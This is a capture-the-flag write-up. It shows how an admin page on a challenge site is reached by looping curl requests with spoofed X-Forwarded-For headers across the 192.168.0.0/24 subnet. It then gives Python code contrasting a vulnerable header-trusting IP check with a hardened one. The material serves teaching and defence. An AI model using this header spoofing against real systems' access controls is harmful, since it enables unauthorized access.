500pts
Access the site at https://cfta-wh01.allyourbases.co and find a way to get the flag from the CMS.
First, scan for directories. I used dirsearch, which uncovered two interesting pages:
- admin.html (0 bytes)
- readme.txt
If you visit readme.txt, you get this message:
To use the CMS make sure to visit /admin.html from allowed IPs on the local network.
Note: Tell engineering to stop moving the subnet from 192.168.0.0/24
We can infer two things:
- Only certain IPs on the local network can access /admin.html
- The local network subnet is 192.168.0.0/24
From this, we can determine that in order to access /admin.html, we need to spoof an IP in the range of 192.168.0.0/24 (e.g. 192.168.0.3; the last octet can be any number from 0 to 256).
I wrote a trusty bash script to do the job:
for i in {0..256}
do
echo "IP: 192.168.0.$i"
curl -i -H "X-Forwarded-For: 192.168.0.$i" https://cfta-wh01.allyourbases.co/admin.html
done
Note: This really isn't the most efficient way, and I just used grep afterwards to find the successful IP, which was 192.168.0.62.
Success! We're on the admin page and we've got the flag.
<!DOCTYPE html>
<html lang="en">
<head>
<title>My Blog</title>
<link rel="stylesheet" href="mysite.css">
</head>
<body>
<div class="main">
<div class="center">
<div class="header">
<h1>Admin</h1>
</div>
<div class="content flag">
<h2>Flag</h2>
iPSpooFinGWiThHopHeaDers91918
</div>
<div class="footer">
Powered By: mycustomcms 2021
</div>
</div>
</div>
</body>
</html>
Flag: iPSpooFinGWiThHopHeaDers91918
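Why the header worked, and how the check should be written, as an added example (not the challenge's or the CMS's actual code). The function names, the plain dict of headers and the 10.0.0.0/8 trusted-proxy range are assumptions made for illustration.

```python
import ipaddress

# Subnet named in readme.txt
ALLOWED_NET = ipaddress.ip_network("192.168.0.0/24")
# Assumption: the only hosts allowed to vouch for a client are our own reverse proxies
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def naive_is_allowed(peer_ip, headers):
    """Vulnerable: believes whatever the client put in X-Forwarded-For."""
    claimed = headers.get("X-Forwarded-For", peer_ip).split(",")[0].strip()
    try:
        return ipaddress.ip_address(claimed) in ALLOWED_NET
    except ValueError:
        return False


def client_ip(peer_ip, headers):
    """Start at the TCP peer and walk X-Forwarded-For right to left,
    stopping at the first address that is not one of our proxies."""
    current = ipaddress.ip_address(peer_ip)
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    while any(current in net for net in TRUSTED_PROXIES) and hops:
        try:
            current = ipaddress.ip_address(hops.pop())
        except ValueError:
            return None  # malformed hop: fail closed
    return current


def hardened_is_allowed(peer_ip, headers):
    """Allow only when the address derived from trusted hops is in the subnet."""
    addr = client_ip(peer_ip, headers)
    return addr is not None and addr in ALLOWED_NET


if __name__ == "__main__":
    # Constructed requests: (TCP peer address, request headers)
    samples = [
        ("203.0.113.7", {"X-Forwarded-For": "192.168.0.62"}),             # direct, spoofed header
        ("10.0.0.5", {"X-Forwarded-For": "192.168.0.62, 203.0.113.7"}),  # spoof + proxy-appended real IP
        ("10.0.0.5", {"X-Forwarded-For": "192.168.0.62"}),               # genuine LAN client via proxy
    ]
    for peer, hdrs in samples:
        print(peer, hdrs, naive_is_allowed(peer, hdrs), hardened_is_allowed(peer, hdrs))
```

The hardened check relies on the proxy appending the real peer address to X-Forwarded-For and on the application being unreachable except through that proxy.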